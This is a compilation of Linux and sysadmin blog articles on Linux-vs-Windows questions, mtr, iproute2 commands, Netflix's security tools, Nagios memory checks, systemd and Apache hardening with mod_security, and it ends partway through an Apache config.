This question is at best subjective, and many Windows users would probably suggest otherwise. In fact, there was an article that appeared last week, by John Dvorak, suggesting that Linux had failed to win over the desktop and was nothing more than an operating system for hobbyists.

You can read my response to that article by clicking here.

Here are some areas where it can be argued that Linux is better than Windows:
  • Performance
  • Security
  • Customisability
  • Price
  • Community 
  • Support
Linux can be made to work on the oldest hardware or the most modern hardware. By tweaking the desktop environment and the applications you use it is possible to make Linux perform in a much more efficient way than Windows.

Another reason Linux performs better is the fact that it doesn't deteriorate over time.

When you first get a computer with Windows on it the performance is usually pretty decent.

Antivirus software instantly places a load onto the computer that just isn't required on a day to day basis for home Linux computers.

Windows tends to slow down after a period of use. This is due to installing applications, system updates and various other tasks that fill up the registry and leave junk on the computer.

Windows 7 is definitely an improvement on Windows Vista and XP because it automatically defragments the hard drive, but both Windows 7 and Windows 8 are noticeably slower than any version of Linux that I run on the same machines.

With regards to security, Linux is better for various reasons. The use of a normal account as opposed to an administrator account certainly helps as it limits the amount of exposure to potential hackers.

Viruses are less likely to affect Linux than Windows as well and this can be attributed to the use of package managers in Linux, the ability for viruses to spread and the level of chaos that virus developers can generate by writing viruses for Linux. This is covered again later on in the article.

If I want to download a Windows application then I have a choice of the whole internet to download from, but how do you tell a reputable site from a non-reputable one? Even so-called reputable sites bundle search tools, optimisers and toolbars with the applications that you download from them. The use of package managers and repositories is a far better way to distribute software.

Linux is ultimately more customisable than Windows. Everything on Linux can be built the way you want it to be. You can choose the display manager (login manager), the window manager, the docks that appear, the terminal, the applications, the fonts, menus and widgets. In Windows you can change the desktop wallpaper, what else?

Linux at the point of use is free. Now many people would say that because Windows came with the computer they are using it is also free. With Windows everything costs money. You buy the computer and the Windows fee is already included. Then you have to pay for the antivirus subscription. If you want to use an office suite you have to pay for it.

Also consider what happens when something goes wrong with Windows. Can you fix it? How much is it going to cost to get it fixed? With Linux there is such a great community and support network that you can probably fix most problems for free, and you don't have to worry about losing the disks that came with your computer because you can create them again for free.

It is unfair to do a yin without a yang, and so whilst searching on "Why Linux" I noticed that second on the list is "Why Linux sucks".

Nobody answers this question better than Bryan Lunduke.


2. Can Linux Read NTFS?

NTFS is the native Windows file system and has been for quite some time.

Can linux read NTFS?

I can prove this one by example. The computer I am using is running Windows 8 and Linux Mint 17. If I open up the Nemo file manager I am able to see the Windows 8 partition.

As you can see from the image above I am able to access the files and folders in the Windows partition formatted to NTFS and I can open photos, music, documents etc.

The answer to the question is therefore yes you can.

A better question might have been "how safe is it to write to NTFS partitions using Linux".

3. Can Linux Get Viruses?

Every operating system can catch a virus but a better thing to consider is the purpose of a virus.

Malware comes in many different forms, and its aim is either to extract money or to cause chaos. In order to do either, the reach of the malware has to be widespread.

Getting one person on one computer to run an application that installs Cryptolocker earns, at most, one ransom payment. In order to make real money, the people spreading ransomware need to get as many people as possible to install it.

Why are there more burglaries in city centres than in country villages? It is easier to burgle a number of properties in close proximity than go from village to village and do one house at a time.
Real life viruses spread in the places that are most populated and with the least protection against that virus.

The same can be said for computer viruses. Windows has the larger userbase and so it is easier and more profitable to create viruses for Windows.

People using Linux for the first time are more likely to stick with installing applications via the package managers and by following guides from recognised sources. These users are unlikely to contract any sort of virus as the package managers are kept clean by the wider community.

Long term Linux users are technically savvy and therefore ultimately less likely to install a virus and even if they do they can probably fix the damage caused anyway and therefore there is little point targeting them.

The biggest danger to new Linux users is following instructions on websites that give false information. Entering commands into a terminal window without fully understanding the commands is potentially very dangerous.

4. Can Linux Run Windows Games?

Linux can do better than run Windows games, Linux can run Linux games as well.

This question therefore also incorporates "Can Linux Run Games?" and "Can Linux Run Steam?"

Steam has over 500 games available for the Linux platform, and GOG.com has started releasing games with full Linux support.


There are native Linux games as well. I wrote an article a while back discussing the games installed with the KDE desktop.

Are there any Minecraft players out there? You can play Minecraft using Linux as well.

To answer the actual question, Windows games can be played using WINE and PlayOnLinux. A full article on WINE and gaming is coming up shortly.

5. Can Linux Replace Windows?

Can Linux replace Windows? Which version of Windows are you looking to replace?

For Windows 7 you can follow this guide to switch to Linux Mint.
For Windows XP you can follow this guide to switch to Lubuntu.

Like the Windows look but not the functionality? Follow this guide to switch to Zorin OS 9.

6. Can Linux Read exFAT?

What is exFAT?

exFAT (Extended File Allocation Table) is a Microsoft file system optimized for flash drives.[3] It is proprietary and patented.[2]
exFAT can be used where the NTFS file system is not a feasible solution (due to data structure overhead), or where the file size limit of the standard FAT32 file system (that is, without FAT32+ extension[4]) is unacceptable.
Although the industry-standard FAT32 file system supports volumes up to 2 TiB, exFAT has been adopted by the SD Card Association as the default file system for SDXC cards larger than 32 GiB.
The above snippet was taken from Wikipedia. exFAT appears to be the file system used on large USB drives and SD cards.

The answer to the question is yes. Linux can read exFAT partitions. You will need to install exfat-fuse and exfat-utils. (See here for details).
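On Ubuntu or Debian based systems, for example, the two packages can be installed like this (package names may differ slightly on other distributions):
$ sudo apt-get install exfat-fuse exfat-utils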

7. Can Linux run exe?

Linux works in a different way to Windows. Files with the .exe extension are executable programs in Windows; they have no meaning in Linux.

In Linux programs are installed via a package manager and are stored as binary files. You can start a program in most versions of Linux by double clicking it or by running it via the command line.

Simply downloading and double clicking an "exe" file in Linux will not work. If you have WINE installed it is possible to run executable files.
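For example, with WINE installed, a Windows executable can be started from the terminal like this (the file name is just a placeholder):
$ wine setup.exe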

8. Can Linux Run On Mac?

It is possible to get Linux to run on Macs, and I have written a guide showing how to dual boot Linux Mint and OS X on a MacBook Air.

This article appears if you ask the same question in Google and there is a really detailed response by someone who has tried Debian and Arch.

The MacBook Air internet connection issue has been solved in my article above but the other points raised are worth thinking about.

I am not a big Mac fan so maybe you can provide your experiences with running Linux on a Mac in the comments below.

9. Can Linux Run Windows Applications?

I feel like I am covering this question to death. The answer is yes (and no). Using WINE it is possible to run many Windows applications and in a lot of cases the applications run perfectly well.

An application designed for Windows will probably never work quite as well on Linux as it does for Windows because it wasn't built for the Linux architecture and you are relying 100% on WINE.

The simplest solution is to either find a good alternative (and believe me there are loads of great alternatives for most Windows applications) or try out the application in WINE to see how well it works.

Another alternative is to dual boot Windows and Linux or run Windows in a virtual machine for the odd piece of software that you need that requires Windows use.


10. Which Linux Distro?

This is the question that I get asked the most, every single day: which Linux distro is best on this machine, or which Linux distro is best on that machine?

Choosing a Linux distribution is a personal thing. I recommend trying a few out in virtual machines or as live distributions and then decide which Linux version suits you the best.

I recently ran a series of articles designed to help in this quest:
I have added to that series by producing an article for linux.about.com.
Here are a couple of articles for those of you looking to put Linux on a netbook:
  

Bonus Question. What Does Linux Look Like?

That is an almost impossible question to answer. I did say almost. Linux can be made to look however you want it to look.

I have a Pinterest page that has a selection of the wallpapers and images that have appeared on this site over the past few years.

Summary

The Google search tool throws up some interesting questions and the 10 that I answered just scratched the surface.

Just adding an extra letter after the search term brings up new results. For instance, "Why Linux a" brings up "Why Linux Ate My Ram" and "Why Linux Arch". The search tool also throws up some fairly bad grammar such as "why linux are better than windows".

I will be looking at Linux gaming over the next week including purpose built gaming distros, games emulators, STEAM and PlayOnLinux.

Thank you for reading.

Unix: Better network connection insights with mtr

http://www.itworld.com/operating-systems/433991/unix-better-network-connection-insights-mtr

Traceroute is still a great tool, but mtr ("my traceroute") provides even more insights when you're looking into network routing problems.

The mtr tool -- "my traceroute", originally "Matt's traceroute" for the guy that first developed it (Matt Kimball in 1997) -- is in some ways like a combination of traceroute and ping and it provides a lot more data than the two of these commands combined.
Like ping and traceroute, mtr uses ICMP packets to test connections. While traceroute is likely to be installed on every Unix system you use, you may have to install mtr separately. If you do, here are some commands for doing so:
  • Ubuntu or Debian systems: apt-get install mtr
  • Fedora or Centos: yum install mtr
  • Mac OS X: brew install mtr
  • FreeBSD: pkg install net/mtr
Like traceroute, mtr uses TTLs (time to live values) so that it can report on each leg of a route individually. It does this by setting the TTL to 1, then 2, then 3 and so on. Each time, it collects the round trip time for the next leg of the trip to the remote system. When it sets the TTL to 2, for example, it gets the timing information for the second leg. At each connection, the router decrements the TTL by one (this is what routers always do). At the final device, it becomes 0 and the tracing goes no further. Instead, an "ICMP TTL exceeded" message is returned, just as it was at each of the other devices; the measurements for the last device are sent back to the source and the report is done.
The latency (round trip) measurement is the timestamp when ICMP reply is received minus the timestamp when the probe was launched.
By default, traceroute issues three probes per hop, so you will see three numbers for each hop in the traceroute output.
Here is some sample traceroute output:
$ traceroute world.pts.com
traceroute to world.pts.com (192.74.137.5), 30 hops max, 40 byte packets
1 pix (192.168.0.2) 0.255 ms 0.478 ms 0.443 ms
2 * * *
3 gig1-6.umcp-core.net.doz.org (136.160.255.33) 9.856 ms 9.343 ms 9.822 ms
4 ten2-0.stpaul-core.net.doz.org (136.160.255.198) 3.401 ms 3.858 ms 3.681 ms
5 te4-3.ccr01.bwi01.atlas.cogentco.com (38.104.12.17) 2.920 ms 2.859 ms 3.280 ms
6 te4-2.ccr01.phl01.atlas.cogentco.com (154.54.2.174) 5.965 ms 5.945 ms 5.920 ms
7 te0-0-0-7.ccr22.jfk02.atlas.cogentco.com (154.54.31.53) 9.084 ms te0-0-0-7.ccr21.
jfk02.atlas.cogentco.com (154.54.1.41) 8.811 ms te0-0-0-7.ccr22.jfk02.atlas.cogentco.
com (154.54.31.53) 8.784 ms
8 be2096.ccr22.bos01.atlas.cogentco.com (154.54.30.42) 14.991 ms be2094.ccr21.bos01
.atlas.cogentco.com (154.54.30.14) 14.764 ms be2096.ccr22.bos01.atlas.cogentco.com
(154.54.30.42) 14.964 ms
9 te4-1.mag02.bos01.atlas.cogentco.com (154.54.43.70) 14.478 ms te4-1.mag01.bos01.
atlas.cogentco.com (154.54.43.50) 14.201 ms 14.171 ms
10 gi0-0-0-0.nr11.b000502-0.bos01.atlas.cogentco.com (154.24.6.237) 14.891 ms 16
.941 ms 16.702 ms
11 cogent.bos.ma.towerstream.com (38.104.186.82) 14.699 ms 14.188 ms 14.220 ms
12 g6-2.cr.bos1.ma.towerstream.com (64.119.143.81) 14.904 ms 14.903 ms 14.888 ms
13 69.38.149.18 (69.38.149.18) 18.293 ms 34.857 ms 33.138 ms
14 64.119.137.154 (64.119.137.154) 33.122 ms 36.814 ms 36.329 ms
15 world.pts.com (192.74.137.15) 34.369 ms 34.567 ms 29.696 ms
The mtr command differs from traceroute in several ways. First, like top, it provides a table of values that refreshes itself every second or so, allowing you to see how the values are updated over time. You can slow this down by giving the command a -i or --interval argument and specifying the number of seconds you want between updates.
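For example, to refresh the display every 5 seconds while tracing the host used throughout this article:
$ mtr -i 5 world.pts.com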
It also shows you the packet loss -- like ping.
The mtr command also shows you a number of statistics for each leg in the route. The columns in the output (see example below) represent:
  • Snt -- number of packets sent
  • Loss% -- percentage of packets lost at each hop (can be changed with --report-cycles=#, where # is the number of packets you want to send)
  • Last -- latency of the last packet sent
  • Avg -- average latency
  • Best -- shortest round trip
  • Wrst -- longest round trip
  • StDev -- standard deviation
Last, Avg, Best, and Wrst are all given in milliseconds.
                                My traceroute  [v0.71]
boson.xyz.org (0.0.0.0)                                    Sun Aug 31 16:22:55 2014
Keys: Help Display mode Restart statistics Order of fields quit
Packets Pings
Host Loss% Last Avg Best Wrst StDev
1. 192.168.0.1 50.0% 0.4 0.4 0.4 0.4 0.0
2. ???
3. gig1-6.umcp-core.net.doz.org 0.0% 1.6 4.0 1.6 6.6 2.5
4. ten2-0.stpaul-core.net.doz.org 0.0% 2.7 2.8 2.7 2.8 0.1
5. te4-3.ccr01.bwi01.atlas.cogentco.com 0.0% 91.5 32.3 2.7 91.5 51.2
6. te4-2.ccr01.phl01.atlas.cogentco.com 0.0% 5.6 11.6 5.6 23.4 10.2
7. te0-0-0-19.mpd21.jfk02.atlas.cogentco.com 0.0% 8.8 8.7 8.7 8.8 0.1
8. be2095.ccr21.bos01.atlas.cogentco.com 0.0% 14.5 14.4 14.3 14.5 0.1
9. te4-1.mag01.bos01.atlas.cogentco.com 0.0% 14.1 14.2 14.1 14.3 0.1
10. gi0-0-0-0.nr11.b000502-0.bos01.atlas.com 0.0% 14.7 14.6 14.6 14.7 0.1
11. cogent.bos.ma.towerstream.com 0.0% 14.1 14.1 14.1 14.1 0.1
12. g6-2.cr.bos1.ma.towerstream.com 0.0% 14.8 14.8 14.8 14.8 0.0
13. 69.38.149.18 0.0% 24.0 26.9 24.0 29.7 4.1
14. 64.119.137.154 0.0% 28.5 28.5 28.5 28.5 0.0
15. world.pts.com 0.0% 23.3 22.2 21.1 23.3 1.5
Another often used mtr option is -r or --report. This gives you a static report rather than a display that updates every second: it runs through 10 iterations (or however many you specify with the -c (count) or --report-cycles option) and shows you the result at the end.
You can ask for a report using syntax like this:
$ mtr world.pts.com --report
boson.xyz.org Snt: 10 Loss% Last Avg Best Wrst StDev
pix 50.0% 0.4 0.4 0.4 0.4 0.0
??? 100.0 0.0 0.0 0.0 0.0 0.0
gig1-6.umcp-core.net.doz.org 0.0% 12.6 4.0 1.5 12.6 3.6
ten2-0.stpaul-core.net.doz.org 0.0% 8.2 5.3 2.7 13.0 4.1
te4-3.ccr01.bwi01.atlas.cogentco.com 0.0% 2.9 33.4 2.6 139.2 52.1
te4-2.ccr01.phl01.atlas.cogentco.com 0.0% 5.7 52.9 5.5 201.2 74.9
te0-0-0-19.mpd21.jfk02.atlas.cogentco.com 0.0% 8.5 8.6 8.5 8.7 0.1
be2095.ccr21.bos01.atlas.cogentco.com 0.0% 14.4 14.6 14.3 15.0 0.2
te4-1.mag01.bos01.atlas.cogentco.com 0.0% 14.5 28.5 14.0 157.2 45.2
gi0-0-0-0.nr11.b000502-0.bos01.atlas.cogentc 0.0% 15.0 14.8 14.7 15.1 0.2
cogent.bos.ma.towerstream.com 0.0% 14.1 27.0 14.0 136.0 38.4
g6-2.cr.bos1.ma.towerstream.com 0.0% 15.9 15.0 14.8 15.9 0.3
69.38.149.18 0.0% 22.6 23.5 18.3 34.2 4.7
64.119.137.154 10.0% 23.0 25.4 19.6 32.0 4.7
world.pts.com 0.0% 21.9 23.7 19.2 29.9 3.6
Both packet loss and latency tell you a lot about the quality of your connections. A large loss indicates a problem with that particular router. Note that in the second line above, we see 100% loss. This router is not sending anything back to us, though this doesn't mean that it isn't a functional router. Obviously, the connections are reaching the final destination. But the router is probably not allowing ICMP traffic back to the source, or is taking too long. The ??? indicates timeouts. Some of the loss that you see may be due to rate-limiting settings on routers.
Some people who use mtr routinely for troubleshooting network connections suggest that you run reports in both directions if you want to fully diagnose your connection issues.

Linux TCP/IP networking: net-tools vs. iproute2

$
0
0
http://xmodulo.com/2014/09/linux-tcpip-networking-net-tools-iproute2.html

Many sysadmins still manage and troubleshoot various network configurations by using a combination of the ifconfig, route, arp and netstat command-line tools, collectively known as net-tools. Originally rooted in the BSD TCP/IP toolkit, net-tools was developed to configure the network functionality of older Linux kernels. Its development in the Linux community has essentially ceased since 2001. Some Linux distros, such as Arch Linux and CentOS/RHEL 7, have already deprecated net-tools in favor of iproute2.
iproute2, another family of network configuration tools, emerged to replace the functionality of net-tools. While net-tools accesses and changes kernel network configurations via procfs (/proc) and the ioctl system call, iproute2 communicates with the kernel via the netlink socket interface. The /proc interface is known to be more heavyweight than the netlink interface. Performance aside, the user interface of iproute2 is also more intuitive than that of net-tools. For example, network resources (e.g., link, IP address, route, tunnel) are aptly defined as "objects", and you can manage different objects using a consistent syntax. Most importantly, iproute2 remains under active development.
If you are still using net-tools, it is time to switch to iproute2, especially if you want to catch up with the latest and greatest networking features of the latest Linux kernel. Chances are that there are many things you can do with iproute2, but cannot with net-tools.
For those who want to make the switch, here is a round-up of net-tools vs. iproute2 comparison.

Show All Connected Network Interfaces

The following commands show a list of all available network interfaces (whether or not they are active).
With net-tools:
$ ifconfig -a
With iproute2:
$ ip link show

Activate or Deactivate a Network Interface

To activate/deactivate a particular network interface, use these commands.
With net-tools:
$ sudo ifconfig eth1 up
$ sudo ifconfig eth1 down
With iproute2:
$ sudo ip link set down eth1
$ sudo ip link set up eth1

Assign IPv4 address(es) to a Network Interface

Use these commands to configure IPv4 addresses of a network interface.
With net-tools:
$ sudo ifconfig eth1 10.0.0.1/24
With iproute2:
$ sudo ip addr add 10.0.0.1/24 dev eth1
Note that with iproute2, you can assign multiple IP addresses to an interface, which you cannot do with ifconfig. A workaround for this with ifconfig is to use IP aliases.
$ sudo ip addr add 10.0.0.1/24 broadcast 10.0.0.255 dev eth1
$ sudo ip addr add 10.0.0.2/24 broadcast 10.0.0.255 dev eth1
$ sudo ip addr add 10.0.0.3/24 broadcast 10.0.0.255 dev eth1
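For reference, the old-style IP alias workaround for ifconfig mentioned above might look something like this (eth1:0 is a hypothetical alias label; the traditional address/netmask form is used here):
$ sudo ifconfig eth1:0 10.0.0.2 netmask 255.255.255.0 up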

Remove an IPv4 address from a Network Interface

As far as IP address removal is concerned, there is no proper way to remove an IPv4 address from a network interface with net-tools, other than assigning 0 to the interface. iproute2 can properly handle this.
With net-tools:
$ sudo ifconfig eth1 0
With iproute2:
$ sudo ip addr del 10.0.0.1/24 dev eth1

Show IPv4 Address(es) of a Network Interface

Checking IPv4 addresses of a particular network interface can be done as follows.
With net-tools:
$ ifconfig eth1
With iproute2:
$ ip addr show dev eth1
Again, if there are multiple IP addresses assigned to an interface, iproute2 shows all of them, while net-tools shows only one IP address.

Assign an IPv6 address to a Network Interface

Use these commands to add IPv6 address(es) to a network interface. Both net-tools and iproute2 allow you to add multiple IPv6 addresses to an interface.
With net-tools:
$ sudo ifconfig eth1 inet6 add 2002:0db5:0:f102::1/64
$ sudo ifconfig eth1 inet6 add 2003:0db5:0:f102::1/64
With iproute2:
$ sudo ip -6 addr add 2002:0db5:0:f102::1/64 dev eth1
$ sudo ip -6 addr add 2003:0db5:0:f102::1/64 dev eth1

Show IPv6 address(es) of a Network Interface

Displaying IPv6 addresses of a particular network interface can be done as follows. Both net-tools and iproute2 can show all assigned IPv6 addresses.
With net-tools:
$ ifconfig eth1
With iproute2:
$ ip -6 addr show dev eth1

Remove an IPv6 address from a Network Interface

Use these commands to remove any unnecessary IPv6 address from an interface.
With net-tools:
$ sudo ifconfig eth1 inet6 del 2002:0db5:0:f102::1/64
With iproute2:
$ sudo ip -6 addr del 2002:0db5:0:f102::1/64 dev eth1

Change the MAC Address of a Network Interface

To spoof the MAC address of a network interface, use the commands below. Note that before changing the MAC address, you need to deactivate the interface first.
With net-tools:
$ sudo ifconfig eth1 hw ether 08:00:27:75:2a:66
With iproute2:
$ sudo ip link set dev eth1 address 08:00:27:75:2a:67

View the IP Routing Table

net-tools has two options for showing the kernel's IP routing table: route and netstat. With iproute2, use the ip route command.
With net-tools:
$ route -n
$ netstat -rn
With iproute2:
$ ip route show

Add or Modify a Default Route

Here are the commands to add or modify a default route in the kernel's IP routing table. Note that with net-tools, modifying a default route is achieved by adding a new default route and then removing the old one. With iproute2, use the ip route replace command.
With net-tools:
$ sudo route add default gw 192.168.1.2 eth0
$ sudo route del default gw 192.168.1.1 eth0
With iproute2:
$ sudo ip route add default via 192.168.1.2 dev eth0
$ sudo ip route replace default via 192.168.1.2 dev eth0

Add or Remove a Static Route

A static route can be added or removed with the following commands.
With net-tools:
$ sudo route add -net 172.16.32.0/24 gw 192.168.1.1 dev eth0
$ sudo route del -net 172.16.32.0/24
With iproute2:
$ sudo ip route add 172.16.32.0/24 via 192.168.1.1 dev eth0
$ sudo ip route del 172.16.32.0/24

View Socket Statistics

Here are the commands to check socket statistics (e.g., active/listening TCP/UDP sockets).
With net-tools:
$ netstat
$ netstat -l
With iproute2:
$ ss
$ ss -l
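As a quick aside (these are standard ss options, not part of the original comparison), listing only listening TCP and UDP sockets with numeric ports might look like this:
$ ss -tuln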

View the ARP Table

You can display the kernel's ARP table with these commands.
With net-tools:
$ arp -an
With iproute2:
$ ip neigh

Add or Remove a Static ARP Entry

Adding or removing a static ARP entry in the local ARP table is done as follows.
With net-tools:
$ sudo arp -s 192.168.1.100 00:0c:29:c0:5a:ef
$ sudo arp -d 192.168.1.100
With iproute2:
$ sudo ip neigh add 192.168.1.100 lladdr 00:0c:29:c0:5a:ef dev eth0
$ sudo ip neigh del 192.168.1.100 dev eth0

Add, Remove or View Multicast Addresses

To configure or view multicast addresses on a network interface, use the commands below.
With net-tools:
$ sudo ipmaddr add 33:44:00:00:00:01 dev eth0
$ sudo ipmaddr del 33:44:00:00:00:01 dev eth0
$ ipmaddr show dev eth0
$ netstat -g
With iproute2:
$ sudo ip maddr add 33:44:00:00:00:01 dev eth0
$ sudo ip maddr del 33:44:00:00:00:01 dev eth0
$ ip maddr list dev eth0

Netflix open sources internal threat monitoring tools

$
0
0
http://www.networkworld.com/article/2599461/security/netflix-open-sources-internal-threat-monitoring-tools.html

Netflix has released three internal tools it uses to catch hints on the Web that hackers might target its services.
“Many security teams need to stay on the lookout for Internet-based discussions, posts and other bits that may be of impact to the organizations they are protecting,” wrote Andy Hoernecke and Scott Behrens of Netflix’s Cloud Security Team.
One of the tools, called Scumblr, can be used to create custom searches of Google sites, Twitter and Facebook for users or keywords. The searches can be set to run regularly or be done manually, they wrote.
Scumblr has a component called Workflowable that can be used to organize and prioritize the results. Workflowable has a plugin architecture that can be used to set custom triggers for automated actions, they wrote.
When something of interest is found on a website, another tool called Sketchy takes a screenshot.
“One of the features we wanted to see in Scumblr was the ability to collect screenshots and text content from potentially malicious sites,” they wrote. “This allows security analysts to preview Scumblr results without the risk of visiting the site directly.”
Scumblr, Sketchy and Workflowable have been released under open-source software licenses on GitHub.
To be sure, many sophisticated attackers keep their discussions of attacks on password-protected forums whose visitors are closely vetted by the site's operators. But there are also many so-called "hacktivists" who are less discreet.
Often eager for publicity, those attackers will use social networking sites such as Twitter to brag or warn of their campaigns, which could be picked up quickly by Scumblr.

How to monitor server memory usage with Nagios Remote Plugin Executor (NRPE)

$
0
0
http://xmodulo.com/2014/09/monitor-server-memory-usage-nagios-remote-plugin-executor.html

In a previous tutorial, we have seen how we can set up Nagios Remote Plugin Executor (NRPE) in an existing Nagios setup. However, the scripts and plugins needed to monitor memory usage do not come with stock Nagios. In this tutorial, we will see how we can configure NRPE to monitor RAM usage of a remote server.
The script that we will use for monitoring RAM is available at Nagios Exchange, as well as in the creator's GitHub repository.
Assuming that NRPE has already been set up, we start the process by downloading the script in the server that we want to monitor.

Preparing Remote Servers

On Debian/Ubuntu:
# cd /usr/lib/nagios/plugins/
# wget https://raw.githubusercontent.com/justintime/nagios-plugins/master/check_mem/check_mem.pl
# mv check_mem.pl check_mem
# chmod +x check_mem
On RHEL/CentOS:
# cd /usr/lib64/nagios/plugins/ (or /usr/lib/nagios/plugins/ for 32-bit)
# wget https://raw.githubusercontent.com/justintime/nagios-plugins/master/check_mem/check_mem.pl
# mv check_mem.pl check_mem
# chmod +x check_mem
You can check whether the script generates output properly by manually running the following command on localhost. When used with NRPE, this command is supposed to check free memory, warn when free memory is less than 20%, and generate critical alarm when free memory is less than 10%.
# ./check_mem -f -w 20 -c 10
OK - 34.0% (2735744 kB) free.|TOTAL=8035340KB;;;; USED=5299596KB;6428272;7231806;; FREE=2735744KB;;;; CACHES=2703504KB;;;;
If you see something like the above as an output, that means the command is working okay.
Now that the script is ready, we define the command to check RAM usage for NRPE. As mentioned before, the command will check free memory, warn when free memory is less than 20%, and generate critical alarm when free memory is less than 10%.
# vim /etc/nagios/nrpe.cfg
For Debian/Ubuntu:
command[check_mem]=/usr/lib/nagios/plugins/check_mem -f -w 20 -c 10
For RHEL/CentOS 32 bit:
command[check_mem]=/usr/lib/nagios/plugins/check_mem -f -w 20 -c 10
For RHEL/CentOS 64 bit:
command[check_mem]=/usr/lib64/nagios/plugins/check_mem -f -w 20 -c 10
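After editing nrpe.cfg, the NRPE daemon has to be restarted so that it picks up the new command definition. The exact service name depends on how NRPE was packaged; on typical installations it might look like this:
# service nagios-nrpe-server restart     (Debian/Ubuntu)
# service nrpe restart                   (RHEL/CentOS)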

Preparing Nagios Server

In the Nagios server, we define a custom command for NRPE. The command can be stored in any directory within Nagios. To keep the tutorial simple, we will put the command definition in /etc/nagios directory.
For Debian/Ubuntu:
# vim /etc/nagios3/conf.d/nrpe_command.cfg
define command{
        command_name check_nrpe
        command_line /usr/lib/nagios/plugins/check_nrpe -H '$HOSTADDRESS$' -c '$ARG1$'
}
For RHEL/CentOS 32 bit:
# vim /etc/nagios/objects/nrpe_command.cfg
define command{
        command_name check_nrpe
        command_line /usr/lib/nagios/plugins/check_nrpe -H $HOSTADDRESS$ -c $ARG1$
}
For RHEL/CentOS 64 bit:
# vim /etc/nagios/objects/nrpe_command.cfg
define command{
        command_name check_nrpe
        command_line /usr/lib64/nagios/plugins/check_nrpe -H $HOSTADDRESS$ -c $ARG1$
}
Now we define the service check in Nagios.
On Debian/Ubuntu:
# vim /etc/nagios3/conf.d/nrpe_service_check.cfg
define service{
        use                            local-service
        host_name                      remote-server
        service_description            Check RAM
        check_command                  check_nrpe!check_mem
}
On RHEL/CentOS:
# vim /etc/nagios/objects/nrpe_service_check.cfg
define service{
        use                            local-service
        host_name                      remote-server
        service_description            Check RAM
        check_command                  check_nrpe!check_mem
}
Finally, we restart the Nagios service.
On Debian/Ubuntu:
# service nagios3 restart
On RHEL/CentOS 6:
# service nagios restart
On RHEL/CentOS 7:
# systemctl restart nagios.service

Troubleshooting

Nagios should now start checking the RAM usage of the remote server using NRPE. If you are having any problems, you could check the following.
  1. Make sure that the NRPE port is allowed all the way to the remote host. The default NRPE port is TCP 5666.
  2. You could try manually checking NRPE operation by executing the check_nrpe command: /usr/lib/nagios/plugins/check_nrpe -H remote-server
  3. You could also try to run the check_mem command manually: /usr/lib/nagios/plugins/check_nrpe -H remote-server -c check_mem
  4. In the remote server, set debug=1 in /etc/nagios/nrpe.cfg. Restart the NRPE service and check the log file /var/log/messages (RHEL/CentOS) or /var/log/syslog (Debian/Ubuntu). The log files should contain relevant information if there are any configuration or permission errors. If there are no hits in the log, it is very likely that the requests are not reaching the remote server due to port filtering at some point.
To sum up, this tutorial demonstrated how we can easily tune NRPE to monitor RAM usage of remote servers. The process is as simple as downloading the script, defining the commands, and restarting the services. Hope this helps.

Colourful ! systemd vs sysVinit Linux Cheatsheet

$
0
0
http://linoxide.com/linux-command/systemd-vs-sysvinit-cheatsheet

systemd is the new init system, first adopted by Fedora and now being adopted by many other distributions such as Red Hat, SUSE and CentOS. For a long time we have all been using traditional SysV init scripts, usually residing in the /etc/rc.d/init.d/ directory. These scripts invoke a daemon binary, which then forks a background process. Even though shell scripts are very flexible, tasks like supervising processes and ordering parallelized execution are hard to implement this way. With the introduction of systemd's new-style daemons, it becomes easier to supervise and control daemons at runtime, and their implementation is simplified.
The systemctl command is a very good addition in systemd that shows detailed error conditions as well as runtime and start-up errors of services. systemd also makes use of cgroups (control groups), which are groups of processes that can be arranged in a hierarchy. With the old init system, working out which process does what and where it belongs becomes increasingly difficult. When processes spawn other processes, the children are automatically made members of the parent's cgroup, which avoids much of the confusion about inheritance.
systemd vs sysVinit cheatsheet
There are a lot of new systemd commands available on RHEL/CentOS 7.0 that replace the old sysvinit commands (a few examples are shown below). You can also download a PDF version of the systemd vs sysvinit cheatsheet.
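To give a small taste of the mapping (standard commands on both sides, shown here against a hypothetical httpd service):
# sysvinit                        # systemd
service httpd restart             systemctl restart httpd.service
service httpd status              systemctl status httpd.service
chkconfig httpd on                systemctl enable httpd.service
chkconfig httpd off               systemctl disable httpd.service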

How to harden Apache web server with mod_security and mod_evasive on CentOS

$
0
0
 http://xmodulo.com/2014/09/harden-apache-web-server-mod_security-mod_evasive-centos.html

Web server security is a vast subject, and different people have different preferences and opinions as to what the best tools and techniques are to harden a particular web server. With the Apache web server, a great majority of experts (if not all) agree that mod_security and mod_evasive are two very important modules that can protect an Apache web server against common threats.
In this article, we will discuss how to install and configure mod_security and mod_evasive, assuming that the Apache HTTP web server is already up and running. We will perform a demo stress test to see how the web server reacts when it is under a denial-of-service (DoS) attack, and show how it fights back with these modules. We will be using the CentOS platform in this tutorial.

Installing mod_security & mod_evasive

If you haven't enabled the EPEL repository in your CentOS/RHEL server, you need to do so before installing these packages.
# yum install mod_security
# yum install mod_evasive
After the installation is complete, you will find the main configuration files inside /etc/httpd/conf.d:

Now you need to make sure that Apache loads both modules when it starts. Look for the following lines (or add them if they are not present) in mod_security.conf and mod_evasive.conf, respectively:
LoadModule security2_module modules/mod_security2.so
LoadModule evasive20_module modules/mod_evasive20.so
In the two lines above:
  • The LoadModule directive tells Apache to link in an object file (*.so), and adds it to the list of active modules.
  • security2_module and evasive20_module are the names of the modules.
  • modules/mod_security2.so and modules/mod_evasive20.so are paths, relative to the /etc/httpd directory, to the module files themselves. This can be verified (and changed, if necessary) by checking the contents of the /etc/httpd/modules directory.

Now restart Apache web server:
# service httpd restart

Configuring mod_security

In order to use mod_security, a Core Rule Set (CRS) must be installed first. Basically, a CRS provides a web server with a set of rules on how to behave under certain conditions. Trustwave's SpiderLabs (the firm behind mod_security) provides the OWASP (Open Web Application Security Project) ModSecurity CRS.
To download and install the latest OWASP CRS, use the following commands.
# mkdir /etc/httpd/crs
# cd /etc/httpd/crs
# wget https://github.com/SpiderLabs/owasp-modsecurity-crs/tarball/master
# tar xzf master
# mv SpiderLabs-owasp-modsecurity-crs-ebe8790 owasp-modsecurity-crs
Now navigate to the installed OWASP CRS directory.
# cd /etc/httpd/crs/owasp-modsecurity-crs
In the OWASP CRS directory, you will find a sample file with rules (modsecurity_crs_10_setup.conf.example).

We will copy its contents into a new file named (for convenience) modsecurity_crs_10_setup.conf.
# cp modsecurity_crs_10_setup.conf.example modsecurity_crs_10_setup.conf
To tell Apache to use this file for the mod_security module, insert the following lines in the /etc/httpd/conf/httpd.conf file. The exact paths may differ depending on where you unpack the CRS tarball.
<IfModule security2_module>
    Include crs/owasp-modsecurity-crs/modsecurity_crs_10_setup.conf
